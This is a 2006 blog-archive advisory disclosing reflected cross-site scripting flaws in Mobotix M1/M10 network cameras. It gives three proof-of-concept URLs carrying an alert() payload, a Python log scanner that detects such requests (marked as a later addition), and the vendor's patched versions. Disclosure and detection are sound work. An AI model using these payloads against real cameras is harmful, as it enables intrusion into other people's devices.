
You are viewing the eazel blog archives for Wednesday, 17 May 2006.

Archive for 17 May 2006

Mobotix IP Network Cameras Multiple XSS

Version: Mobotix IP Network Cameras Multiple Cross Site Scripting
Tested on M1 and M10
- M10-V2.0.5.2
- M1-V1.9.4.7
Discovered by: jaime.blasco(at)eazel(dot).es
http://www.eazel.es
Description: Mobotix cameras are vulnerable to multiple cross-site scripting flaws. Due to improper filtering of request data, a remote attacker can trigger cross-site scripting in these scripts:

http://camera/help/help?%3CBODY%20ONLOAD=alert(‘www.eazel.es’)%3E

http://camera/control/events.tar?source_ip=%3CBODY%20ONLOAD=alert(‘www.eazel.es’)%3E&download=egal

http://camera/control/eventplayer?get_image_info_abspath=%3CBODY%20ONLOAD=alert(‘www.eazel.es’)%3E
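
A defender-side check for the reflection described above, added here as an example and not part of the original advisory: it scans web access log lines for requests to the three listed scripts whose decoded query string carries HTML markup. The combined log format (as a proxy in front of the camera would write it), the sample entries and the function names are assumptions.

```python
import re
from urllib.parse import unquote, urlsplit

# Scripts the advisory lists as reflecting request data unfiltered.
AFFECTED_PATHS = {"/help/help", "/control/events.tar", "/control/eventplayer"}
# An opening/closing tag or an inline event-handler attribute.
MARKUP = re.compile(r"<\s*[a-z!/]|\bon[a-z]+\s*=", re.IGNORECASE)
# Request line of a common/combined-format access log entry.
REQUEST = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')

def decode_fully(value, max_rounds=3):
    """URL-decode repeatedly so double-encoded markup (%253C) is seen too."""
    for _ in range(max_rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value

def suspicious_requests(log_lines):
    """Return (line_number, path, decoded_query) for each flagged request."""
    hits = []
    for number, line in enumerate(log_lines, start=1):
        match = REQUEST.search(line)
        if not match:
            continue
        target = urlsplit(match.group(1))
        if target.path not in AFFECTED_PATHS:
            continue
        query = decode_fully(target.query)
        if MARKUP.search(query):
            hits.append((number, target.path, query))
    return hits

# Constructed sample entries, not taken from a real device or proxy.
SAMPLE_LOG = [
    '10.0.0.5 - - [17/May/2006:10:00:01 +0200] "GET /control/eventplayer'
    '?get_image_info_abspath=/events/E00001.jpg HTTP/1.1" 200 512',
    '10.0.0.9 - - [17/May/2006:10:02:13 +0200] "GET /help/help'
    '?%3CBODY%20ONLOAD=alert(1)%3E HTTP/1.1" 200 2048',
    '10.0.0.9 - - [17/May/2006:10:02:40 +0200] "GET /control/events.tar'
    '?source_ip=%253Cb%253Etest%253C/b%253E&download=egal HTTP/1.1" 200 90',
    '10.0.0.7 - - [17/May/2006:10:05:00 +0200] "GET /index.html?q=%3Cb%3E HTTP/1.1" 200 10',
]

if __name__ == "__main__":
    for number, path, query in suspicious_requests(SAMPLE_LOG):
        print(f"line {number}: {path} <- {query}")
```

Requests to other paths are ignored on purpose, so the check stays tied to the scripts named in this advisory.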

Vendor: MOBOTIX provides new software versions that include a security patch
that prevents cross site scripting flaws.

MOBOTIX encourages customers to upgrade to at least software version
- V2.2.3.18 (for camera models M10/D10) and
- V3.0.3.31 (for camera model M22)
or higher (if available). The software is available for download from
our website www.mobotix.com:
http://www.mobotix.com/services/software_downloads

keywords: advisory001